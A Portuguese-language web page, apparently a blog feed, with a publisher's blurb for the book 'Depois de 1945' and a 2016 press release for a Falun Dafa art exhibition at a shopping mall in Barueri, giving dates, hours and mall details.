Depois de 1945 combina o relato autobiográfico a um sobrevoo sobre a história alemã e a história mundial após a Segunda Guerra Mundial, oferecendo uma exegese detalhada do pensamento de Martin Heidegger e Jean Paul Sartre, reflexões perspicazes sobre Samuel Beckett e Paul Celan, e análises insuspeitadas sobre fenômenos culturais que vão de Edith Piaf até o Relatório Kinsey. Essa incursão pessoal e filosófica sobre o século passado lança cores e luzes sobre a análise de nossa identidade atual.

Mais informações sobre os livros publicados pela Editora Unesp estão disponíveis no site:www.editoraunesp.com.br

Imprimir o Post No Comments Share

A Exibição Internacional de Arte traz pinturas que retratam a severa perseguição realizada pelo Partido Comunista na China contra a liberdade de crença e expressão

Barueri, setembro de 2016 – De 17 de setembro a 16 de outubro, o Iguatemi Alphaville recebe a mostra “A Arte de Verdade Benevolência Tolerância”, que reúne quadros de 18 artistas chineses, unidos para mostrar ao mundo através da arte, a perseguição realizada pelo Partido Comunista Chinês à liberdade de crença, expressão e reunião. Desde 20 de julho de 1999, milhões de pessoas são perseguidas por serem praticantes de Falun Dafa, uma prática para o aprimoramento da mente e corpo, a qual une exercícios físicos e meditação para uma melhor qualidade de vida.

A exposição traz 22 pinturas, cheias de significados que representam visualmente a experiência desses artistas em situações e eventos ocorridos recentemente na China, e que, por retaliação às suas crenças tiveram que emigrar e se asilarem em outros países. Alguns dos participantes experimentaram severas privações de seus direitos humanos enquanto viviam em seu país de origem (China), sendo torturados e mortos em campos de trabalho forçado, além de terem seus órgãos extraídos e vendidos no maior mercado de tráfico de órgãos do mundo. Esses presos de consciência também tem uma trajetória marcada pela perda de amigos, familiares, emprego e posição social.

A exibição que já passou por mais de 110 países e 300 cidades ao redor do mundo, como: Alemanha, Itália, Argentina, Austrália, França, Bélgica, Canadá, Estados Unidos, e muitos outros, foi intitulada com base nos princípios da prática de Falun Dafa: Verdade, Benevolência e a Tolerância. A mostra foi idealizada pelo renomado artista chinês Kunlun Zhang – um prisioneiro de consciência, que também sofreu por ser praticante de Falun Dafa.

Serviço:

Exposição Falun Dafa

Quando: de 17 de setembro à 16 de outubro

Horário: de segunda a sábado – das 10h00 às 22h00

Domingos e feriados -  das 11h00 às 20h00.

Onde: Piso Xingu do Shopping Iguatemi Alphaville (Al. Rio Negro, 111 – Alphaville – Barueri/SP)

Mais informações: www.iguatemi.com.br/alphaville ou pelo telefone (11) 2078-8000.

Sobre o Shopping Iguatemi Alphaville – O Iguatemi Alphaville possui mais de 200 lojas, distribuídas em quatro pisos, com as melhores marcas e um mix de moda diversificado. O empreendimento está situado em uma região privilegiada, na entrada principal de acesso aos bairros Alphaville e Tamboré, entre as alamedas Rio Negro e Xingu, próxima à rodovia Castelo Branco. Com dez restaurantes e as melhores redes de fast food, o projeto conta com skylight e jabuticabeira, além de áreas de seating e food garden, criadas pelo arquiteto Arthur Casas, que oferecem conforto, requinte e aconchego. A rede Cinépolis traz nove exclusivas salas de cinema, sendo três salas VIP e três com tecnologia 3D. O shopping possui estacionamento com 1.700 vagas, ambulatório, fraldário, concierge, serviço de valet e foi concebido seguindo os critérios de sustentabilidade empresarial, que geram economia nos recursos e bem-estar aos visitantes. O shopping Iguatemi Alphaville está localizado na Alameda Rio Negro, 111. Mais informações: www.iguatemi.com.br/alphaville

Imprimir o Post No Comments Share